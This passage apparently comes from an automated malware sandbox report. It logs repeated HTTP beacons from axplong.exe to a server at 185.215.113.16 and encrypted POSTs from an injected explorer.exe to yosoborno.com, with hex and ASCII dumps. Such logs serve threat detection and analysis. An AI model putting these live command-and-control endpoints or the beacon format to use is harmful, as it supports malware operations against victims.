2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49763	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:52.830773115 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:53.578366995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:53.579065084 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:53.826744080 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49764	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:52.982039928 CEST	274	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://anawxrbkfkfj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: yosoborno.com
Aug 26, 2024 23:29:52.982059956 CEST	140	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 44 39 a8 a1 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vuD9\|KGHsfqQ1rsGMlA5]KWJ4K~
Aug 26, 2024 23:29:54.066286087 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:53 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49765	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:53.939841986 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:54.683693886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:54.684642076 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:54.930771112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49766	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:54.074671984 CEST	277	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yftntduqpyxhree.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: yosoborno.com
Aug 26, 2024 23:29:54.074686050 CEST	239	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 73 18 cb e2 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vusN/Uaf}`^tz=oN]$~32TY<Db->U--B[jAe`EVXRG<p1uB~V]U
Aug 26, 2024 23:29:55.174793005 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:54 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49767	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:55.049607992 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:55.828732014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:55.829617023 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:56.100225925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49768	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:55.184089899 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://glntlgidstliw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 167 Host: yosoborno.com
Aug 26, 2024 23:29:55.184288025 CEST	167	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 30 38 a5 a6 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu08h>ZoH%PhA;<.jHBB+gH(CrX=IIN=8n-]a
Aug 26, 2024 23:29:56.281040907 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49769	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:56.221101046 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:56.969259977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:56.970005989 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:57.217931032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49770	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:56.290030003 CEST	277	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bjdfeejtpkvhqtj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 300 Host: yosoborno.com
Aug 26, 2024 23:29:56.290115118 CEST	300	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 5c 36 ee e8 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu\6l\wNv+WIryXaaWr'K=UfGXvC#T3)#Ma/INU"It<b"d@O1:?msP3
Aug 26, 2024 23:29:57.400522947 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49771	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:57.337090015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:58.094316959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:58.095110893 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:58.343909979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49772	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:57.409400940 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jcwfxkmtfjs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: yosoborno.com
Aug 26, 2024 23:29:57.409418106 CEST	266	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3b 2d a2 e7 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu;-VXtd4lGD~WC+o9P131U"Gc_.q5y46B<P;\4$BU%3Muxalu@5
Aug 26, 2024 23:29:58.484956980 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49773	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:58.459045887 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:59.238040924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:59.239168882 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:59.493948936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49774	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:58.493166924 CEST	276	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jxhkilfoavetpm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: yosoborno.com
Aug 26, 2024 23:29:58.493186951 CEST	247	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 67 25 b5 e6 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vug%NZ^w=u:RV4gH,,U;6\!TI2;{z^kNVif%+9LsNpepNC}e_1:#
Aug 26, 2024 23:29:59.610656023 CEST	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 76 12 7e 54 e0 37 00 fd ff 4f bd 9f f1 a3 23 db 20 c2 b6 26 42 10 Data Ascii: #\v~T7O# &B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49775	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:59.611424923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:00.361567020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:00.362360001 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
